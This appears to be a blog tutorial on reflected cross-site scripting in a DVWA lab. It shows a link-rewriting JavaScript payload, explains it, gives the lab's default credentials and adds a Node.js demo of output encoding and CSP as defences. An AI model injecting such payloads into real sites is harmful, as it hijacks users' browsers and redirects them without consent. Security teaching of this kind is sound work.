XX attack - reflected XSS attack hijacking the user's browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflected XSS attack that jumps to the vulnerable page. The attack could also be carried out directly in DVWA, but we construct a relatively complex environment for demonstration purposes.
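```html
<script>
// Run the anonymous function once the page has finished loading
window.onload = function() {
  // Collect every <a> element on the page
  var link = document.getElementsByTagName("a");
  // Point each link at the attacker-chosen URL
  for (var j = 0; j < link.length; j++) {
    link[j].href = "http://www.baidu.com";
  }
};
</script>
```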
JavaScript code analysis: `window.onload` runs the anonymous function once the web page has finished loading.
What the function does: `document.getElementsByTagName` gets all of the `a` tags and stores them in `link`, an array-like collection. A `for` loop then replaces the `href` of every element in it with the malicious URL.
Open the Chrome browser and test the effect on the reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php (user name: admin, password: password) and change the security level to low.
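As an added example (not code from the original post), the Node.js sketch below shows why the payload above runs when a page reflects a request parameter without encoding, and how HTML-encoding the value plus a Content-Security-Policy header neutralizes it. The function names, the `name` parameter and the page markup are assumptions made for illustration.

```javascript
// Added example: a reflected parameter rendered unencoded vs. HTML-encoded.
// All function names and the page markup are hypothetical.

// Constructed input: the link-rewriting payload discussed on this page.
const payload =
  '<script>window.onload = function() {' +
  'var link=document.getElementsByTagName("a");' +
  'for(var j = 0; j < link.length; j++) {' +
  'link[j].href="http://www.baidu.com";}}</script>';

// Vulnerable: the parameter is concatenated into the HTML as-is, so the
// browser parses the <script> element and runs it when the page loads.
function renderVulnerable(name) {
  return '<pre>Hello ' + name + '</pre><a href="/home">Home</a>';
}

// Encode the characters that can change the HTML parsing context.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hardened: the same page, but the reflected value is encoded for the HTML
// body context, so the payload is displayed as text and never executes.
function renderHardened(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre><a href="/home">Home</a>';
}

// Defence in depth: a policy without 'unsafe-inline' makes the browser
// refuse inline <script> blocks even if an encoding step is missed.
function securityHeaders() {
  return { 'Content-Security-Policy': "default-src 'self'; script-src 'self'" };
}

// Simple check used below: does the markup contain a script start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable output has <script>:', containsScriptTag(renderVulnerable(payload)));
console.log('hardened output has <script>:  ', containsScriptTag(renderHardened(payload)));
console.log('headers:', securityHeaders());
```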